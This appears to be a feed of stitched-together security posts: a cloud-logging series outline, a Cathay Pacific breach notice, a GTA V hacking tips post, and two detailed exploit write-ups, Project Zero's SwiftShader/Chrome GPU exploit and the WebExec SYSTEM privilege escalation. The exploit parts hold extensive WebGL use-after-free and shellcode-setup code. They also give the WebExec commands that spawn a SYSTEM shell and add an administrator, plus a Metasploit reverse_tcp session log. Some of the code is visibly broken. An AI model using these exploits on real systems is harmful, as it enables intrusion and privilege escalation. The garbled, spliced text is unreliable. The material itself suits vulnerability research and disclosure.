  3. Native Logging Features: We’ll discuss what sorts of logs you can expect to receive from the various types of cloud services, what you may not receive in a shared responsibility service, the different data sources firms have come to expect, and how to get them. We will also provide practical notes on logging in GCP, Azure, and AWS. We will help you navigate their native offerings, as well as the capabilities of PaaS/SaaS vendors.
  4. BYO Logging: Where and how to fill gaps with third-party tools, or by building them into the applications and services you deploy in the cloud.
  5. Cloud or On-premise Management? We will discuss tradeoffs between moving log management into the cloud, keeping these activities on-premise, and using a hybrid model. This includes risks and benefits of connecting cloud workloads to on-premise networks.
  6. Security Analytics: More and more firms are augmenting or replacing traditional SIEM with security analytics, data lakes, and ML/AI; so we will discuss some of these approaches along with various data sources for threat detection, compliance, and governance. This is the goal behind 1-5 above: facilitating the ability to collect, transform, and store – to gain real-time and historical insight.

As always, questions, comments, disagreements, and other constructive input are encouraged.

- Adrian Lane

Cathay Pacific data breach affects up to 9.4 million customers

Cathay Pacific, the primary airline of Hong Kong known for its high-speed WiFi, was hit with a major data breach that affects up to 9.4 million passengers. The company said that personal information including passport numbers, identity card numbers, credit card numbers, frequent flyer membership program numbers, customer service comments and travel history had been compromised. No passwords were compromised, which may not be any consolation.

Via: The Guardian

Source: Cathay Pacific

“Grand Theft Auto V” Hack: How to Defeat the Online Gaming Bug

Over the past two decades, we’ve seen a huge rise in the popularity of online gaming among both children and adults. One particular game that has experienced huge success is “Grand Theft Auto,” or GTA, which has been developed and produced by Rockstar Games. The most recent edition of the game, “Grand Theft Auto V,” hit $6 billion in sales as of April 2018, creating a record-breaking impact in the gaming industry. However, the game’s massive success doesn’t mean it’s immune to cyberattacks. A recent vulnerability in “Grand Theft Auto V” allowed malicious trolls to take over the games of users entering single-player mode. By leveraging the flaw, these hackers were not only able to kick gamers out of their single-player sessions but could also continually kill their avatars.

So how exactly did these trolls carry out these attacks? Beginning last week, reports began to circulate that one popular ‘mod menu,’ or a series of alterations sought out and installed by players, was suddenly advertising the ability to discover an online player’s Rockstar ID – a problem potentially originating from a bug in the game’s most recent update. Taking advantage of this opportunity, hackers gained access to users’ Rockstar IDs and took control of their single-player games. Soon enough, legitimate players’ games were hijacked and sabotaged.

It is unclear as to whether this vulnerability came out of Rockstar’s most recent update or if this hack has been around for years and just now found its way to public PC mod menus. Either way, it sheds light on how persistent cyberthreats are in the world of online gaming – even impacting some of the most popular video games out there, such as “Grand Theft Auto V.”

Fortunately, reports are already circulating that the bug was quietly patched over the weekend (though without confirmation from the game’s developer) – so to protect against the hack, all users should update their game as soon as possible. That said, there are still steps gamers can take to protect themselves from future hacks and vulnerabilities. Check out the following tips:

  • Limit the personal info on your online profile. Gamers are required to create a user profile in order to access the appropriate console/computer network. When creating your profile, avoid displaying your personal information that could potentially be used against you by hackers, such as your name, address, date of birth, and email address.
  • Create a unique and complex password for your online profile. The more complex the password, the more difficult it will be for a hacker to access your personal information. And, of course, make sure you don’t share your password with other users.
  • Be careful who you chat with. Online games will usually have a built-in messenger service that allows players to contact each other. It’s important to be aware of the risks associated with chatting to strangers. If you choose to use the chat feature in your online game, never give out your account details and avoid opening messages with attached files or links.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post “Grand Theft Auto V” Hack: How to Defeat the Online Gaming Bug appeared first on McAfee Blogs.

Heap Feng Shader: Exploiting SwiftShader in Chrome

Posted by Mark Brand, Google Project Zero

On the majority of systems, under normal conditions, SwiftShader will never be used by Chrome - it’s used as a fallback if you have a known-bad “blacklisted” graphics card or driver. However, Chrome can also decide at runtime that your graphics driver is having issues, and switch to using SwiftShader to give a better user experience. If you’re interested in seeing the performance difference, or just want to have a play, you can launch Chrome using SwiftShader instead of GPU acceleration with the --disable-gpu command line flag.

SwiftShader is quite an interesting attack surface in Chrome, since all of the rendering work is done in a separate process; the GPU process. Since this process is responsible for drawing to the screen, it needs to have more privileges than the highly-sandboxed renderer processes that are usually handling webpage content. On typical Linux desktop system configurations, technical limitations in sandboxing access to the X11 server mean that this sandbox is very weak; on other platforms such as Windows, the GPU process still has access to a significantly larger kernel attack surface. Can we write an exploit that gets code execution in the GPU process without first compromising a renderer? We’ll look at exploiting two issues that we reported that were recently fixed by Chrome.

It turns out that if you have a supported GPU, it’s still relatively straightforward for an attacker to force your browser to use SwiftShader for accelerated graphics - if the GPU process crashes more than 4 times, Chrome will fall back to this software rendering path instead of disabling acceleration. In my testing it’s quite simple to cause the GPU process to crash or hit an out-of-memory condition from WebGL - this is left as an exercise for the interested reader. For the rest of this blog-post we’ll be assuming that the GPU process is already in the fallback software rendering mode.

Previous precision problems

So; we previously discussed an information leak issue resulting from some precision issues in the SwiftShader code - so we’ll start here, with a useful leaking primitive from this issue. A little bit of playing around brought me to the following result, which will allocate a texture of size 0xb620000 in the GPU process, and when the function read() is called on it will return the 0x10000 bytes directly following that buffer back to javascript. (The allocation happens at the glTexImage2D call, and the out-of-bounds access during the blitFramebuffer call.)

function issue_1584(gl) {
 const src_width  = 0x2000;
 const src_height = 0x16c4;

 // we use a texture for the source, since this will be allocated directly
 // when we call glTexImage2D.
 this.src_fb = gl.createFramebuffer();
 gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

 let src_data = new Uint8Array(src_width * src_height * 4);
 for (var i = 0; i < src_data.length; ++i) {
   src_data[i] = 0x41;
 }

 let src_tex = gl.createTexture();
 gl.bindTexture(gl.TEXTURE_2D, src_tex);
 gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_width, src_height, 0, gl.RGBA, gl.UNSIGNED_BYTE, src_data);
 gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
 gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
 gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, src_tex, 0); = function() {
   gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

   const dst_width  = 0x2000;
   const dst_height = 0x1fc4;

   dst_fb = gl.createFramebuffer();
   gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

   let dst_rb = gl.createRenderbuffer();
   gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);
   gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_width, dst_height);
   gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, dst_rb);

   gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

   // trigger
   gl.blitFramebuffer(0, 0, src_width, src_height,
                      0, 0, dst_width, dst_height,
                      gl.COLOR_BUFFER_BIT, gl.NEAREST);

   // copy the out of bounds data back to javascript
   var leak_data = new Uint8Array(dst_width * 8);
   gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);
   gl.readPixels(0, dst_height - 1, dst_width, 1, gl.RGBA, gl.UNSIGNED_BYTE, leak_data);
   return leak_data.buffer;
 };

 return this;
}

This might seem like quite a crude leak primitive, but since SwiftShader is using the system heap, it’s quite easy to arrange for the memory directly following this allocation to be accessible safely.
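As a quick sanity check on the constants in the snippet (assuming 4 bytes per RGBA8 texel), the allocation size and the over-read region line up like this:

```python
# Source texture: 0x2000 x 0x16c4 texels, 4 bytes per RGBA8 texel.
src_width, src_height = 0x2000, 0x16c4
alloc_size = src_width * src_height * 4
print(hex(alloc_size))  # 0xb620000 - the allocation size quoted above

# The destination renderbuffer is taller (0x1fc4 rows vs 0x16c4), so the blit
# reads rows past the end of the source allocation; reading back the final
# destination row is what returns adjacent heap bytes to javascript.
dst_height = 0x1fc4
print(hex((dst_height - src_height) * src_width * 4))  # total over-read span
```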

And a second bug

Now, the next vulnerability we have is a use-after-free of an egl::ImageImplementation object caused by a reference count overflow. This object is quite a nice object from an exploitation perspective, since from javascript we can read and write from the data it stores, so it seems like the nicest exploitation approach would be to replace this object with a corrupted version; however, as it’s a c++ object we’ll need to break ASLR in the GPU process to achieve this. If you’re reading along in the exploit code, the function leak_image in feng_shader.html implements a crude spray of egl::ImageImplementation objects and uses the information leak above to find an object to copy.
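Before looking at the trigger code, the arithmetic behind a reference count overflow is worth spelling out - a minimal sketch, assuming the count lives in a 32-bit integer (as it did here):

```python
MASK = 0xffffffff  # a 32-bit reference count field

refs = 1                      # the legitimate owner's reference
refs = (refs + 2**32) & MASK  # 2**32 attacker-driven increments wrap the
print(refs)                   # counter right back to 1...
refs = (refs - 1) & MASK      # ...so a single extra decrement drives it to 0,
print(refs)                   # freeing the object while real references remain
```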

So - a stock-take. We’ve just free’d an object, and we know exactly what the data that *should* be in that object looks like. This seems straightforward - now we just need to find a primitive that will allow us to replace it!

This was actually the most frustrating part of the exploit. Due to the multiple levels of validation/duplication/copying that occur when OpenGL commands are passed from WebGL to the GPU process (Initial WebGL validation (in renderer), GPU command buffer interface, ANGLE validation), getting a single allocation of a controlled size with controlled data is non-trivial! The majority of allocations that you’d expect to be useful (image/texture data etc.) end up having lots of size restrictions or being rounded to different sizes.

However, there is one nice primitive for doing this - shader uniforms. This is the way in which parameters are passed to programmable GPU shaders; and if we look in the SwiftShader code we can see that (eventually) when these are allocated they will do a direct call to operator new[]. We can read and write from the data stored in a uniform, so this will give us the primitive that we need.

The code below implements this technique for (very basic) heap grooming in the SwiftShader/GPU process, and an optimised method for overflowing the reference count. The shader source code will cause 4 allocations of size 0xf0 when the program object is linked, and the final copyTexImage2D call is where the original object will be free’d, to be replaced by a shader uniform object.

function issue_1585(gl, fake) {
 let vertex_shader = gl.createShader(gl.VERTEX_SHADER);
 gl.shaderSource(vertex_shader, `
   attribute vec4 position;
   uniform int block0[60];
   uniform int block1[60];
   uniform int block2[60];
   uniform int block3[60];

   void main() {
     gl_Position = position;
     gl_Position.x += float(block0[0]);
     gl_Position.x += float(block1[0]);
     gl_Position.x += float(block2[0]);
     gl_Position.x += float(block3[0]);
   }`);
 gl.compileShader(vertex_shader);

 let fragment_shader = gl.createShader(gl.FRAGMENT_SHADER);
 gl.shaderSource(fragment_shader, `
   void main() {
     gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);
   }`);
 gl.compileShader(fragment_shader);

 this.program = gl.createProgram();
 gl.attachShader(this.program, vertex_shader);
 gl.attachShader(this.program, fragment_shader);

 const uaf_width = 8190;
 const uaf_height = 8190;

 this.fb = gl.createFramebuffer();
 uaf_rb = gl.createRenderbuffer();

 gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.fb);
 gl.bindRenderbuffer(gl.RENDERBUFFER, uaf_rb);
 gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, uaf_width, uaf_height);
 gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, uaf_rb);

 let tex = gl.createTexture();
 gl.bindTexture(gl.TEXTURE_CUBE_MAP, tex);
 // trigger
 for (i = 2; i < 0x10; ++i) {
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
 }

 function unroll(gl) {
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
   // snip ...
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
 }

 for (i = 0x10; i < 0x100000000; i += 0x10) {
   unroll(gl);
 }

 // the reference count of the egl::ImageImplementation for the rendertarget
 // of uaf_rb is now 0, so this call will free it, leaving a dangling reference
 gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 256, 256, 0);

 // replace the allocation with our shader uniform.
 gl.linkProgram(this.program);
 gl.useProgram(this.program);

 function wait(ms) {
   var start =,
       now = start;
   while (now - start < ms) {
     now =;
   }
 }

 function read(uaf, index) {
   var read_data = new Int32Array(60);
   for (var i = 0; i < 60; ++i) {
     read_data[i] = gl.getUniform(uaf.program, gl.getUniformLocation(uaf.program, 'block' + index.toString() + '[' + i.toString() + ']'));
   }
   return read_data.buffer;
 }

 function write(uaf, index, buffer) {
   gl.uniform1iv(gl.getUniformLocation(uaf.program, 'block' + index.toString()), new Int32Array(buffer));
 } = function() {
   return read(this, this.index);
 };

 this.write = function(buffer) {
   return write(this, this.index, buffer);
 };

 for (var i = 0; i < 4; ++i) {
   write(this, i, fake.buffer);
 }

 gl.readPixels(0, 0, 2, 2, gl.RGBA_INTEGER, gl.UNSIGNED_INT, new Uint32Array(2 * 2 * 16));
 for (var i = 0; i < 4; ++i) {
   data = new DataView(read(this, i));
   for (var j = 0; j < 0xf0; ++j) {
     if (fake.getUint8(j) != data.getUint8(j)) {
       log('uaf block index is ' + i.toString());
       this.index = i;
       return this;
     }
   }
 }
}

At this point we can modify the object to allow us to read and write from all of the GPU process’ memory; see the read_write function for how the gl.readPixels and gl.blitFramebuffer methods are used for this.

Now, it should be fairly trivial to get arbitrary code execution from this point - and although it’s often a pain to get your ROP chain to line up nicely when you have to replace a c++ object, it’s a very tractable problem. It turns out, though, that there’s another trick that will make this exploit more elegant.

SwiftShader uses JIT compilation of shaders to get as high performance as possible - and that JIT compiler uses another c++ object to handle loading and mapping the generated ELF executables into memory. Maybe we can create a fake object that uses our egl::ImageImplementation object as a SubzeroReactor::ELFMemoryStreamer object, and have the GPU process load an ELF file for us as a payload, instead of fiddling around ourselves?

We can - so by creating a fake vtable such that:
egl::ImageImplementation::lockInternal -> egl::ImageImplementation::lockInternal
egl::ImageImplementation::unlockInternal -> ELFMemoryStreamer::getEntry
egl::ImageImplementation::release -> shellcode

When we then read from this image object, instead of returning pixels to javascript, we’ll execute our shellcode payload in the GPU process.


It’s interesting that, when we look at things sideways, we can find directly javascript-accessible attack surface in some unlikely places in a modern browser codebase - avoiding the perhaps more obvious and highly contested areas such as the main javascript JIT engine.

In many codebases, there is a long history of development and there are many trade-offs made for compatibility and consistency across releases. It’s worth reviewing some of these to see whether the original expectations turned out to be valid after the release of these features, and if they still hold today, or if these features can actually be removed without significant impact to users.

These Factors MUST Work For Every Successful Ransomware Attack. DNS is Always Involved.

A government agency found itself infected with ransomware and had to pay the ransom to restore service. Another local agency opted not to pay the ransom and restored operations on its own. Ransomware targeted at organizations is still a threat, and even with backups, getting back online is a highly disruptive and public event that comes with serious costs and potentially lost revenue.

Technical Rundown of WebExec

This is a technical rundown of a vulnerability that we've dubbed "WebExec". The summary is: a flaw in WebEx's WebexUpdateService allows anyone with a login to the Windows system where WebEx is installed to run SYSTEM-level code remotely. That's right: this client-side application that doesn't listen on any ports is actually vulnerable to remote code execution! A local or domain account will work, making this a powerful way to pivot through networks until it's patched.

High level details and FAQ at! Below is a technical writeup of how we found the bug and how it works.


This vulnerability was discovered by myself and Jeff McJunkin from Counter Hack during a routine pentest. Thanks to Ed Skoudis for permission to post this writeup.

If you have any questions or concerns, I made an email alias specifically for this issue:!

You can download a vulnerable installer here and a patched one here, in case you want to play with this yourself! It probably goes without saying, but be careful if you run the vulnerable version!


During a recent pentest, we found an interesting vulnerability in the WebEx client software while we were trying to escalate local privileges on an end-user laptop. Eventually, we realized that this vulnerability is also exploitable remotely (given any domain user account) and decided to give it a name: WebExec. Because every good vulnerability has a name!

As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We're calling the class "thank you for your service", because we can, and are crossing our fingers that more are out there!

The version of WebEx we tested is the latest client build as of August 2018: Version 3211.0.1801.2200, modified 7/19/2018, SHA1: bf8df54e2f49d06b52388332938f5a875c43a5a7. We've tested some older and newer versions since then, and they are still vulnerable.

WebEx released a patch on October 3, but requested we maintain the embargo until they released their advisory. You can find all the patching instructions on

The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely. If you're concerned about the service being remotely start-able by any user (which you should be!), the following command disables that function:


That removes remote and non-interactive access from the service. It will still be vulnerable to local privilege escalation, though, without the patch.

Privilege Escalation

What initially got our attention is that folder (c:\ProgramData\WebEx\WebEx\Applications\) is readable and writable by everyone, and it installs a service called "webexservice" that can be started and stopped by anybody. That's not good! It is trivial to replace the .exe or an associated .dll with anything we like, and get code execution at the service level (that's SYSTEM). That's an immediate vulnerability, which we reported, and which ZDI apparently beat us to the punch on, since it was fixed on September 5, 2018, based on their report.

Due to the application whitelisting, however, on this particular assessment we couldn't simply replace this with a shell! The service starts non-interactively (i.e., no window and no command-line arguments). We explored a lot of different options, such as replacing the .exe with other binaries (such as cmd.exe), but no GUI meant no ability to run commands.

One test that almost worked was replacing the .exe with another whitelisted application, msbuild.exe, which can read arbitrary C# commands out of a .vbproj file in the same directory. But because it's a service, it runs with the working directory c:\windows\system32, and we couldn't write to that folder!

At that point, my curiosity got the best of me, and I decided to look into what webexservice.exe actually does under the hood. The deep dive ended up finding gold! Let's take a look.

Deep dive into WebExService.exe

It's not really a good motto, but when in doubt, I tend to open something in IDA. The two easiest ways to figure out what a process does in IDA are the strings window (Shift+F12) and the imports window. In the case of webexservice.exe, most of the strings were related to Windows service stuff, but something caught my eye:

  .rdata:00405438 ; wchar_t aSCreateprocess
  .rdata:00405438 aSCreateprocess:                        ; DATA XREF: sub_4025A0+1E8o
  .rdata:00405438                 unicode 0, <%s::CreateProcessAsUser:%d;%ls;%ls(%d).>,0

I found the import for CreateProcessAsUserW in advapi32.dll, and looked at how it was called:

  .text:0040254E                 push    [ebp+lpProcessInformation] ; lpProcessInformation
  .text:00402554                 push    [ebp+lpStartupInfo] ; lpStartupInfo
  .text:0040255A                 push    0               ; lpCurrentDirectory
  .text:0040255C                 push    0               ; lpEnvironment
  .text:0040255E                 push    0               ; dwCreationFlags
  .text:00402560                 push    0               ; bInheritHandles
  .text:00402562                 push    0               ; lpThreadAttributes
  .text:00402564                 push    0               ; lpProcessAttributes
  .text:00402566                 push    [ebp+lpCommandLine] ; lpCommandLine
  .text:0040256C                 push    0               ; lpApplicationName
  .text:0040256E                 push    [ebp+phNewToken] ; hToken
  .text:00402574                 call    ds:CreateProcessAsUserW

The W on the end refers to the UNICODE ("wide") version of the function. When developing Windows code, developers typically write CreateProcessAsUser in their code, and the preprocessor expands it to CreateProcessAsUserA for ANSI builds or CreateProcessAsUserW for UNICODE builds. If you look up the function definition for CreateProcessAsUser, you'll find everything you need to know.

In any case, the two most important arguments here are hToken - the user it creates the process as - and lpCommandLine - the command that it actually runs. Let's take a look at each!


The code behind hToken is actually pretty simple. If we scroll up in the same function that calls CreateProcessAsUserW, we can just look at API calls to get a feel for what's going on. Trying to understand what code's doing simply based on the sequence of API calls tends to work fairly well in Windows applications, as you'll see shortly.

At the top of the function, we see:

  .text:0040241E                 call    ds:CreateToolhelp32Snapshot

This is a normal way to search for a specific process in Win32 - it creates a "snapshot" of the running processes and then typically walks through them using Process32FirstW and Process32NextW until it finds the one it needs. I even used the exact same technique a long time ago when I wrote my Injector tool for loading a custom .dll into another process (sorry for the bad code.. I wrote it like 15 years ago).

Based simply on knowledge of the APIs, we can deduce that it's searching for a specific process. If we keep scrolling down, we can find a call to _wcsicmp, which is a Microsoft way of saying stricmp for UNICODE strings:

  .text:00402480                 lea     eax, [ebp+Str1]
  .text:00402486                 push    offset Str2     ; "winlogon.exe"
  .text:0040248B                 push    eax             ; Str1
  .text:0040248C                 call    ds:_wcsicmp
  .text:00402492                 add     esp, 8
  .text:00402495                 test    eax, eax
  .text:00402497                 jnz     short loc_4024BE

Specifically, it's comparing the name of each process to "winlogon.exe" - so it's trying to get a handle to the "winlogon.exe" process!

If we continue down the function, you'll see that it calls OpenProcess, then OpenProcessToken, then DuplicateTokenEx. That's another common sequence of API calls - it's how a process can get a handle to another process's token. Shortly after, the token it duplicates is passed to CreateProcessAsUserW as hToken.

To summarize: this function gets a handle to winlogon.exe, duplicates its token, and creates a new process as the same user (SYSTEM). Now all we need to do is figure out what the process is!

An interesting takeaway here is that I didn't really really read assembly at all to determine any of this: I simply followed the API calls. Often, reversing Windows applications is just that easy!


This is where things get a little more complicated, since there is a series of function calls to traverse to figure out lpCommandLine. I had to use a combination of reversing, debugging, troubleshooting, and event logs to figure out exactly where lpCommandLine comes from. This took a good full day, so don't be discouraged by this quick summary - I'm skipping an awful lot of dead ends and validation to stick to the interesting bits.

One such dead end: I initially started by working backwards from CreateProcessAsUserW, or forwards from main(), but I quickly became lost in the weeds and decided that I'd have to go the other route. While scrolling around, however, I noticed a lot of debug strings and calls to the event log. That gave me an idea - I opened the Windows event viewer (eventvwr.msc) and tried to start the process with sc start webexservice:

C:\Users\ron>sc start webexservice

SERVICE_NAME: webexservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)

You may need to configure Event Viewer to show everything in the Application logs. I didn't really know what I was doing, but eventually I found a log entry for WebExService.exe:

  ExecuteServiceCommand::Not enough command line arguments to execute a service command.

That's handy! Let's search for that in IDA (alt+T)! That leads us to this code:

  .text:004027DC                 cmp     edi, 3
  .text:004027DF                 jge     short loc_4027FD
  .text:004027E1                 push    offset aExecuteservice ; "ExecuteServiceCommand"
  .text:004027E6                 push    offset aSNotEnoughComm ; "%s::Not enough command line arguments t"...
  .text:004027EB                 push    2               ; wType
  .text:004027ED                 call    sub_401770

A tiny bit of actual reversing: compare edi to 3, jump if greater or equal, otherwise print that we need more commandline arguments. It doesn't take a huge logical leap to determine that we need 2 or more commandline arguments (since the name of the process is always counted as well). Let's try it:

C:\Users\ron>sc start webexservice a b


Then check Event Viewer again:

  ExecuteServiceCommand::Service command not recognized: b.

Don't you love verbose error messages? It's like we don't even have to think! Once again, search for that string in IDA (alt+T) and we find ourselves here:

  .text:00402830 loc_402830:                             ; CODE XREF: sub_4027D0+3Dj
  .text:00402830                 push    dword ptr [esi+8]
  .text:00402833                 push    offset aExecuteservice ; "ExecuteServiceCommand"
  .text:00402838                 push    offset aSServiceComman ; "%s::Service command not recognized: %ls"...
  .text:0040283D                 push    2               ; wType
  .text:0040283F                 call    sub_401770

If we scroll up just a bit to determine how we get to that error message, we find this:

  .text:004027FD loc_4027FD:                             ; CODE XREF: sub_4027D0+Fj
  .text:004027FD                 push    offset aSoftwareUpdate ; "software-update"
  .text:00402802                 push    dword ptr [esi+8] ; lpString1
  .text:00402805                 call    ds:lstrcmpiW
  .text:0040280B                 test    eax, eax
  .text:0040280D                 jnz     short loc_402830 ; <-- Jumps to the error we saw
  .text:0040280F                 mov     [ebp+var_4], eax
  .text:00402812                 lea     edx, [esi+0Ch]
  .text:00402815                 lea     eax, [ebp+var_4]
  .text:00402818                 push    eax
  .text:00402819                 push    ecx
  .text:0040281A                 lea     ecx, [edi-3]
  .text:0040281D                 call    sub_4025A0

The string software-update is what the argument is compared to. So instead of b, let's try software-update and see if that gets us further! I want to once again point out that we're only doing an absolutely minimal amount of reverse engineering at the assembly level - we're basically entirely using API calls and error messages!

Here's our new command:

C:\Users\ron>sc start webexservice a software-update


Which results in the new log entry:

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Exception code: 0xc0000005
  Fault offset: 0x00002643
  Faulting process id: 0x654
  Faulting application start time: 0x01d42dbbf2bcc9b8
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Report Id: 31555e60-99af-11e8-8391-0800271677bd

Uh oh! I'm normally excited when I get a process to crash, but this time I'm actually trying to use its features! What do we do!?

First of all, we can look at the exception code: 0xc0000005. If you Google it, or develop low-level software, you'll know that it's a memory fault. The process tried to access a bad memory address (likely NULL, though I never verified).

The first thing I tried was the brute-force approach: adding more commandline arguments! My logic was that it might require 2 arguments but actually use the third and onwards for something, then crash when they aren't present.

So I started the service with the following commandline:

C:\Users\ron>sc start webexservice a software-update a b c d e f


That led to a new crash, so progress!

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f7ce6
  Exception code: 0x40000015
  Fault offset: 0x000a7676
  Faulting process id: 0x774
  Faulting application start time: 0x01d42dbc22eef30e
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\MSVCR120.dll
  Report Id: 60a0439c-99af-11e8-8391-0800271677bd

I had to google 0x40000015; it means STATUS_FATAL_APP_EXIT. In other words, the app exited, but hard - probably a failed assert()? We don't really have any output, so it's hard to say.

This one took me a while, and this is where I'll skip the dead ends and debugging and show you what worked.

Basically, keep following the codepath immediately after the software-update string we saw earlier. Not too far after, you'll see this function call:

  .text:0040281D                 call    sub_4025A0

If you jump into that function (double click), and scroll down a bit, you'll see:

  .text:00402616                 mov     [esp+0B4h+var_70], offset aWinsta0Default ; "winsta0\\Default"

I used the most advanced technique in my arsenal here and googled that string. It turns out that it's a handle to the default desktop and is frequently used when starting a new process that needs to interact with the user. That's a great sign, it means we're almost there!

A little bit after, in the same function, we see this code:

  .text:004026A2                 push    eax             ; EndPtr
  .text:004026A3                 push    esi             ; Str
  .text:004026A4                 call    ds:wcstod ; <--
  .text:004026AA                 add     esp, 8
  .text:004026AD                 fstp    [esp+0B4h+var_90]
  .text:004026B1                 cmp     esi, [esp+0B4h+EndPtr+4]
  .text:004026B5                 jnz     short loc_4026C2
  .text:004026B7                 push    offset aInvalidStodArg ; &quot;invalid stod argument&quot;
  .text:004026BC                 call    ds:?_Xinvalid_argument@std@@YAXPBD@Z ; std::_Xinvalid_argument(char const *)

The wcstod() call (marked with the arrow above) is close to where the abort() happened. I'll spare you the debugging details - debugging a service was non-trivial - but I really should have spotted that function call before I got off track.

I looked up wcstod() online, and it's another of Microsoft's cleverly named functions. This one converts a string to a number. If it fails, the code references something called std::_Xinvalid_argument. I don't know exactly what it does from there, but we can assume that it's looking for a number somewhere.
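As a rough analogue (Python, for illustration only - not WebEx's actual code), the parsing behaviour the log hints at looks like this:

```python
def parse_number_argument(arg):
    """Roughly mimic the wcstod()/stod path: return a number on success,
    raise (like std::_Xinvalid_argument) when no number can be parsed."""
    try:
        return float(arg)
    except ValueError:
        raise ValueError("invalid stod argument")

print(parse_number_argument("1"))   # 1.0 - the only value that worked here
# parse_number_argument("calc")     # raises ValueError: invalid stod argument
```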

This is where my advice becomes "be lucky". The reason is, the only number that will actually work here is "1". I don't know why, or what other numbers do, but I ended up calling the service with the commandline:

C:\Users\ron>sc start webexservice a software-update 1 2 3 4 5 6

And checked the event log:

  StartUpdateProcess::CreateProcessAsUser:1;1;2 3 4 5 6(18).

That looks awfully promising! I changed 2 to an actual process:

  C:\Users\ron>sc start webexservice a software-update 1 calc c d e f

And it opened!

C:\Users\ron>tasklist | find "calc"
calc.exe                      1476 Console                    1     10,804 K

It actually runs with a GUI, too, so the tasklist check was kind of unnecessary - I could literally see it! And it's running as SYSTEM!

Speaking of unknowns, running cmd.exe and powershell the same way does not appear to work. We can, however, run wmic.exe and net.exe, so we have some choices!
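Pulling the whole reversing effort together, the service's argument handling can be modelled in a few lines (a reconstruction for illustration - the function name and return strings are simplifications, not WebEx's actual code):

```python
def execute_service_command(argv):
    """Model of WebExService.exe's command dispatch, as recovered above."""
    if len(argv) < 3:                          # cmp edi, 3 / jge
        return "Not enough command line arguments to execute a service command."
    if argv[2].lower() != "software-update":   # lstrcmpiW is case-insensitive
        return "Service command not recognized: %s." % argv[2]
    float(argv[3])                             # wcstod(); must be a number ("1")
    command_line = " ".join(argv[4:])          # becomes lpCommandLine for
    return "CreateProcessAsUser(SYSTEM, %r)" % command_line  # CreateProcessAsUserW

# models: sc start webexservice a software-update 1 wmic process call create cmd.exe
print(execute_service_command(
    ["webexservice", "a", "software-update", "1",
     "wmic", "process", "call", "create", "cmd.exe"]))
```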

Local exploit

The simplest exploit is to start cmd.exe with wmic.exe:

C:\Users\ron>sc start webexservice a software-update 1 wmic process call create "cmd.exe"

That opens a GUI cmd.exe instance as SYSTEM:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system

If we can't or choose not to open a GUI, we can also escalate privileges:

C:\Users\ron>net localgroup administrators

C:\Users\ron>sc start webexservice a software-update 1 net localgroup administrators testuser /add

C:\Users\ron>net localgroup administrators

And this all works as an unprivileged user!

Jeff wrote a local module for Metasploit to exploit the privilege escalation vulnerability. If you have a non-SYSTEM session on the affected machine, you can use it to gain a SYSTEM account:

meterpreter > getuid
Server username: IEWIN7\IEUser

meterpreter > background
[*] Backgrounding session 2...

msf exploit(multi/handler) > use exploit/windows/local/webexec
msf exploit(windows/local/webexec) > set SESSION 2

msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/webexec) > set LHOST
msf exploit(windows/local/webexec) > set LPORT 9001
msf exploit(windows/local/webexec) > run

[*] Started reverse TCP handler on
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\yqaKLvdn.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to
[*] Meterpreter session 2 opened ( -> at 2018-08-31 14:45:25 -0700
[*] Service started...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Remote exploit

